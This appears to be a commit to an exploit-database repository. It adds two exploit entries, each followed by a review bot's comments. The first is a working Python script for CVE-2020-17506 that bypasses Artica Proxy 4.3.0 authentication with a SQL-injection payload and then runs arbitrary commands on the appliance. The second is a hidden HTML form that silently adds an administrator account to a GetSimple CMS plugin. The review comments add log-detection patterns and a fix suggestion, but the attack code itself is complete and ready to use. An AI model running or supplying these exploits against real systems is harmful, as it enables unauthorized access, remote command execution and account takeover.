DB: 2020-08-14
2 changes to exploits/shellcodes Artica Proxy 4.3.0 - Authentication Bypass GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)
parent
a999edcbb6
commit
e3b25a25ca
3 changed files with 87 additions and 0 deletions
52
exploits/hardware/webapps/48744.py
Executable file
52
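--- a/exploits/hardware/webapps/48744.py
+++ b/exploits/hardware/webapps/48744.py
@@ -0,0 +1,52 @@
+# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-08-13
+# Exploit Author: Dan Duffy
+# Vendor Homepage: http://articatech.net/
+# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
+# Version: 4.30.00000000 (REQUIRED)
+# Tested on: Debian
+# CVE : CVE-2020-17506
+
+import requests
+import argparse
+from bs4 import BeautifulSoup
+
+
+def bypass_auth(session, args):
+login_endpoint = "/fw.login.php?apikey="
+payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
+
+print("[+] Bypassing authentication...")
+session.get(args.host + login_endpoint + payload, verify=False)
+
+return session
+
+
+def run_command(session, args):
+cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)
+print("[+] Running command: {}".format(args.command))
+response = session.post(args.host + cmd_endpoint, verify=False)
+soup = BeautifulSoup(response.text, "html.parser")
+print(soup.find_all("code")[1].get_text())
+
+
+def main():
+parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
+parser.add_argument(
+"--host", help="The host to target. Format example: https://host:port",
+)
+parser.add_argument("--command", help="The command to run")
+
+args = parser.parse_args()
+if not args.host or not args.command:
+parser.print_help()
+exit(0)
+session = requests.Session()
+session = bypass_auth(session, args)
+
+run_command(session, args)
+
+
+if __name__ == "__main__":
+main()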
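Review bot: The `payload` string in `bypass_auth` is committed as an opaque URL-encoded blob with no comment saying what it carries, so anyone triaging CVE-2020-17506 from this entry has to decode it by hand. I would add a comment above it along the lines of `# apikey appears to reach a SQL query unescaped; the UNION row supplies a base64 PHP-serialized array (uid, ACTIVE_DIRECTORY_INDEX)`, which is what the leading quote, the `UNION select` and the decoded blob indicate. For defenders the two request shapes visible here are the useful part: a GET to `/fw.login.php` whose `apikey` value contains `UNION`, followed by a POST to `/cyrus.index.php` carrying `service-cmds-peform=`, are the patterns to search for in the appliance's web logs. The header gives the affected version but no fixed release, so a `# Fixed in:` line pointing at the vendor's patched build would let readers judge their exposure.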
33
exploits/php/webapps/48745.txt
Normal file
33
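--- a/exploits/php/webapps/48745.txt
+++ b/exploits/php/webapps/48745.txt
@@ -0,0 +1,33 @@
+# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)
+# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
+# Date: August 2020-08-12
+# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/
+# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip
+# Version: 1.8.2
+# Tested On: Windows 10 Pro + XAMPP
+# CWE-352: Cross-Site Request Forgery (CSRF)
+# Vulnerability Description:
+# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site.
+
+## Usage:
++ Change <IP||DOMAIN> to target IP address or domain name
++ Change <ADMIN> to target username
++ Change <PASSWORD> to target password
+
+## CSRF POST Form Method
+<html>
+<body>
+<script>history.pushState('', '', '/')</script>
+<form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST">
+<input type="hidden" name="usernamec" value="<ADMIN>" />
+<input type="hidden" name="useremail" value="ADMIN@DOMAIN.LOCAL" />
+<input type="hidden" name="ntimezone" value="" />
+<input type="hidden" name="userlng" value="en_US" />
+<input type="hidden" name="userpassword" value="<PASSWORD>" />
+<input type="hidden" name="usereditor" value="1" />
+<input type="hidden" name="Landing" value="" />
+<input type="hidden" name="add-user" value="Add New User" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>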
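Review bot: The Usage lines call `<ADMIN>` and `<PASSWORD>` the "target username" and "target password", but in the form they populate `usernamec` and `userpassword` of the `add-user` request, so they are the credentials of the account being created, not anything belonging to the victim; I would reword them as `+ Change <ADMIN> to the username of the account to be added`, and likewise for the password. The write-up also stops at impact: none of the posted fields is an anti-CSRF token, which suggests the handler behind `/admin/load.php?id=user-managment` accepts the request on the session cookie alone, and a closing line naming the fix (a per-session nonce verified before `add-user` is processed) would make the entry usable for remediation. On the detection side, an unexpected account in the plugin's user list, or a POST to that URL arriving with an off-site `Referer`, is the trace an administrator should look for. The header date (2020-08-12) and author list also differ from the index row added in the same commit (2020-08-13, `boku` only), which may be intentional but is worth confirming.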
|
@ -42985,3 +42985,5 @@ id,file,description,date,author,type,platform,port
|
|||
48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php,
|
||||
48742,exploits/php/webapps/48742.txt,"CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload",2020-08-12,"Roel van Beurden",webapps,php,
|
||||
48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php,
|
||||
48744,exploits/hardware/webapps/48744.py,"Artica Proxy 4.3.0 - Authentication Bypass",2020-08-13,"Dan Duffy",webapps,hardware,
|
||||
48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,
|
||||
|
|